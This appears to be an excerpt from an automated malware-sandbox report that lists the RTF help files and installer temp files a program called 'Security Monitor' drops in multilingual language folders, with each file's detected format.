C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-5P9PC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-8VMSL.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-BF7L0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-GTTGK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-GUCRO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-IIL8T.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-JVC6B.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KKP9M.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-LL2U7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-NIQOO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-O1KT5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-O79GJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-P6UCM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-SDKPM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\McAfee_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\eset_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-15V5O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-1HMU0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-1NEEC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-2P21T.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-5U0M3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-D67PO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-FD9G4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-GHOD4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-HPV3G.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-IITLO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-IOPDE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-IS96C.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-MCGCD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-MUJ9G.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-N4EIP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-NJI8P.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-P3CN5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-S9P3L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-SDGI4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-UDCT4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-VIN6N.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\law_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\norton_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-0BO2D.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-1S7FJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4EDJE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-9S883.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-ANRBD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-BLE6M.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-CKLNR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-DJ3MN.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-FP2JJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-I9L13.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-IQIC6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-JEP15.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-JFQN5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-L61JI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-SVVRT.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-TE8SC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-V4A2L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish.lng (copy)
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-03IPS.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-2CHSA.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-583BD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5CVA8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-7U44V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-8QP2V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-9F2RK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-CSDRP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-DSAIP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-EAD4O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-FFQ50.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-FTU8J.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-GQN9V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-H1BQK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-HREJ0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-NOU64.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-VPIEG.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\snapshot.rtf (copy)
|
